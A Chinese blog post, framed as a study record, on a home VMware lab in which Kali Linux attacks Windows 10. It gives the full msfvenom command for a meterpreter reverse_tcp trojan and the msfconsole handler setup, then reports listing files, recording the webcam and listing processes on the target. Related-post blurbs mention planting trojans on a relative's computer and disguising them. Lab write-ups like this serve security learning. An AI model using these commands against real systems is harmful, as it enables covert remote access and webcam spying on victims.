vmware条件下使用kali linux虚拟机对windows10进行渗透攻击的记录(学习使用)

已于 2024-05-10 15:39:07 修改
阅读量8.9k 收藏 82
点赞数 13
文章标签: linux 网络安全 学习 运维
于 2021-11-14 10:33:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wcf2020/article/details/121314653
版权

使用kali linux虚拟机对windows10进行渗透攻击的记录

一、安装vmware tools以保证在虚拟机上创建的文件与主机可相互移动:

    VMware Tools是VMware虚拟机中自带的一种增强工具,是VMware提供的增强虚拟显卡和硬盘性能、以及同步虚拟机与主机时钟的驱动程序。只有在VMware虚拟机中安装好了VMware Tools,才能实现主机与虚拟机之间的文件共享,同时可支持自由拖拽的功能,鼠标也可在虚拟机与主机之间自由移动(不用再按ctrl+alt),且虚拟机屏幕也可实现全屏化。

  1. 创建vmtools文件夹用于存放vmware tools的安装文件:              

2.切换到media/cdrom0 目录查看安装文件名并复制:                                                                               

(务必确保vmware tools安装包已经放入该文件夹)

  1. 使用cp 命令将安装文件复制到刚刚创建的vmtools目录中

 cd~

 cp /media/cdrmo/文件安装包名/root/vmtools

  1. 切换到vmtools目录,使用tar -zxvf参数解压缩tar.gz文件:

 cd vmtools/

 ls

 tar -zxvf 安装包名

5:在vmtools目录下切换到vmware-tools-distrib,找到安装文件并复制文件名

 cd vmware-tools-distrib/

 ls

6 运行安装文件

之后一直enter即可,直至出现Enjoy字样表示已经安装完成。

  • 对windows10进行渗透攻击:
  1. 查找本机的ip地址:

输入: ifconfig

可知本机ip地址为192.168.214.129

  1. 可使用fping对局域网内所有ip进行扫描: 

  1. 正式开始攻击:
  1. 使用msfvenom生成一个木马文件shell.exe

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.198.134 lport=5555 -f exe R > /root/shell.exe

lhost -->本地的IP地址

lport -->反向连接到主机的端口

R> -->木马生成的保存输出路径

  1. 打开msfconsole,键入以下代码

msf > use exploit/multi/handler -->设置模块

msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp -->设置payload为反向tcp连接

msf exploit(multi/handler) > set lhost 192.168.198.134 -->设置本地的IP地址

msf exploit(multi/handler) > set lport 5555 -->设置端口,需要跟前面生成的木马端口一致

  1. 进行攻击:

exploit -->执行攻击命令

同时,将木马文件shell.exe放在目标机器(windows10)上并开始运行

此时在目标机器上并没有变化,但是木马文件确实已开始运行:

渗透已实现

  1. 攻击1:查看目标机器上的工作目录:

此时,目标机器上的文件目录已经显示在linux终端上

攻击成功

攻击2:调用目标机器摄像头并进行视频录制:

此时,目标机上的摄像头已经打开并开始进行视频,在linux虚拟机上可查看:

(由于已将摄像头遮挡,所以无图像)

攻击成功

攻击3:获取目标机器上正在运行的进程

目标机上正在运行的进程在linux虚拟机终端已显示

攻击成功。

参考:



后渗透之meterpreter使用攻略 - 先知社区 (aliyun.com)

北宸枫光
关注
Kali MSF攻击Win10
nlj1860453的博客
01-05 1267
如果没有问题,它会打开监听,现在我们在Windows上运行木马文件,Windows如果没有任何反应,只是鼠标转圈圈,MSF输出了“meterpreter>“字样的时候,攻击就成功了!运行后就可以看到此路径下有一个叫“shell.exe”的可执行文件,把他拖到Windows上(实际情况是我爸的电脑,可以使用社会工程学上传上去),这一步就大功告成了!我Windows的IP是192.168.1.1*,我kali的IP是192.168.1.*。如果你的虚拟机是VM虚拟机,那么你下载VM图标的,其它虚拟机以此类推。
记录一次永恒之蓝(ms17-010)漏洞攻击 【后附msf常用命令】
向安全进发的博客
03-28 4012
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。#执行一个已有的模块,这里要说的是输入run后按两下tab,会列出所有的已有的脚本,常用的有。
如何使用kali来入侵(渗透)一台windows_kali利用win11漏洞
最新发布
2401_85773496的博客
07-22 890
工具:一台带有kali linux系统的虚拟机,一个聪明的大脑开始前我们先需要将kali虚拟机改为桥接网络模式,否则会导致渗透失败1.打开虚拟机,点击虚拟机2.点击设置3.点击网络适配器,看左边点击桥接模式,点击确定即可好了,现在我们就要正式渗透一个windows系统啦,兴不兴奋?1.打开虚拟机2.打开终端,输入sudo su进入root用户权限3.进入root权限后输入ifconfig查看本机ip地址,eth0旁边192开头的为本机ip。
如何使用kali来入侵(渗透)一台windows
qq_46406833的博客
05-17 2万+
此文章为网络安全爱好者小白设计的,所以木马没做免杀,渗透前请把防火墙和杀毒软件关闭
kali渗透Windows
m0_61680503的博客
04-13 530
运用kali渗透Windows系统打开摄像头和截图
Kali Linux渗透测试--windows 10入侵和提权过程
无崖子的博客
08-21 3万+
进行入侵检测之前,配置好网络环境,使其相互连通,才能进行入侵。在使用Metasploit成功入侵之后拿到的只是一个基础的shell,要想拿到系统级别的shell,添加系统用户,获取用户登录口令,还需要进一步提权。 一、Metasploit对windows 10入侵测试 环境
Kali Linux-Metasploit入侵Windows10系统
冷色调的夏天的博客
08-01 3万+
Kali Linux-Metasploit入侵Windows10 写在前文 距离上一次写KALI黑客攻防的博文已是去年这个时候了 之所以再次动手写这类的文章一是因为兴趣,二是看到网上五花八门的文章都是复制粘贴过来的,而且并没有写的很清楚,因此就有了本篇博客的出现 免责声明 切勿根据本文做违法之事,如做违法之事皆于博主本人无关! 实验环境 以下环境可以是两台真实物理机,也可以是一台物理机安装虚拟机 上述两种情况我均已尝试成功,由于在一台电脑上写博文较为方便 因此之后的截图是在一台物理机上的。 KALI:(攻
kali渗透Windows
m0_51786204的博客
04-03 1275
我们这里也可以把这个程序伪装一下,把他的图标改一下,或者把它捆绑在某些软件上面,当用户打开就自动安装到对方电脑上面。本地端口自己随便设置一个没有被占用的端口号,如果端口号被占用那么文件会生成失败,换一个端口号就行。解释: 本地ip写自己Kali的IP地址,用ifconfig就能查看自己Kali的IP地址。(3)命令: set LhOST 192.168.32.1(填写自己主机的IP地址)(2)命令: sessions -i 1(选择需要攻击的用户,这里选择第 1 个)可以写个容易让目标主机上钩的名字。
复现|使用Kali生成木马,渗透Windows系统
Maricopig的博客
05-13 1510
简单复现了使用kali中的msfvenom工具生成木马文件,并在靶机中执行后,展示后渗透阶段可操作内容。
十二、VMware Workstation环境安装以及Kali Linux虚拟机安装运行教程
01-11
在本教程中,我们将深入探讨如何在Windows操作系统上设置VMware Workstation环境,并在此环境中安装和运行Kali LinuxKali Linux是一款专为网络安全渗透测试设计的开源Linux发行版,广泛用于教育、研究和实战场景...
全网超详细的VMware虚拟机安装Kali Linux系统以及首次启动Kali Linux系统的注意事项
念兮为美
02-20 2711
全网超详细的VMware虚拟机安装Kali Linux系统以及首次启动Kali Linux系统的注意事项
最新超详细虚拟机VMware安装Kali Linux的图文教程
09-14
本教程将详细讲解如何使用VMware Workstation安装Kali Linux,一个专为渗透测试和安全研究设计的操作系统。 首先,确保你有一台电脑和已安装的VMware Workstation。Kali Linux的官方下载页面提供了多种版本,根据你...
Kali Linux VMwarekali-linux-2022.2-vmware-amd64.part1.rar)
06-14
Kali Linux VMwarekali-linux-2022.2-vmware-amd64.7z)文件分割成 3个 压缩包,必须集齐3个 文件后才能一起解压一起使用kali-linux-2022.2-vmware-amd64.part1.rar ... kali-linux-2022.2-vmware-amd64.part2.rar...
win环境下虚拟机创建及kali的安装
08-02
Windows环境下创建虚拟机并安装Kali Linux是一个常见的任务,对于进行渗透测试、安全研究或者学习Linux操作系统来说非常实用。本文将详细介绍如何使用VMwareWindows系统上搭建虚拟机,并安装Kali Linux。 首先...
VMware虚拟机kali对win10进行ARP欺骗(2023/5/16)
weixin_62152230的博客
05-16 1474
VMware虚拟机kali对win10进行ARP欺骗
利用kaliWindows进行msf渗透(详细介绍)
2302_78587828的博客
09-17 1917
msfencode.是用来生成后门的软件。MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。msfvenom支持多种操作系统和架构,包括WindowsLinux、macOS以及各种CPU架构。它可以生成各种类型的恶意软件,如反向连接和绑定Shell、Meterpreter反弹Shell、恶意文档、木马等。
Kali利用msf渗透Windows电脑(超详细)
热门推荐
RFZ_322的博客
03-09 4万+
Msfvenom命令总结大全1.实时监控屏幕run vnc -i 2.打开摄像头webcam_snap 用kali入侵别人的电脑,手机,安卓,苹果,mac,linxu系统,渗透到对方电脑然后展开进攻
利用kali Linux 渗透windows 操作系统
YJlio的博客
03-05 7658
利用kali Linux 渗透windows 操作系统 一、实验目的:使用kali生成木马,渗透windows系统 二、实验内容: 使用kali中的Metasploit生成木马,控制windows系统 三、实验环境 需要从VMware Workstation 中创建两台虚拟机 一台kali linux和一台靶机windows系统 1、攻击者ip(kali) 192.168.63.21 2、靶机ip(windows)192.168.63.20 四、实验步骤 先将虚拟机的网络模式修改为桥接模
Kali社会工程学套件入侵Windows
我不是猫叔
08-31 1312
通过Kali系统自带的社会工程学套件制作基于Windows系统的恶意感染设备(SET、MSF、INF文件利用) MSFconsole一款不错的入侵渗透环境可以通过制作木马或者是漏洞利用去入侵计算机系统并且监听控制 SEToolkit(简称SET)一款我觉得比较不错的社会工程学套件 inf文件Windows系统文件利用 一、创建攻击组织,搭建实验室网络环境 1台攻击机(Kali)1台普通的wi...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

北宸枫光

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值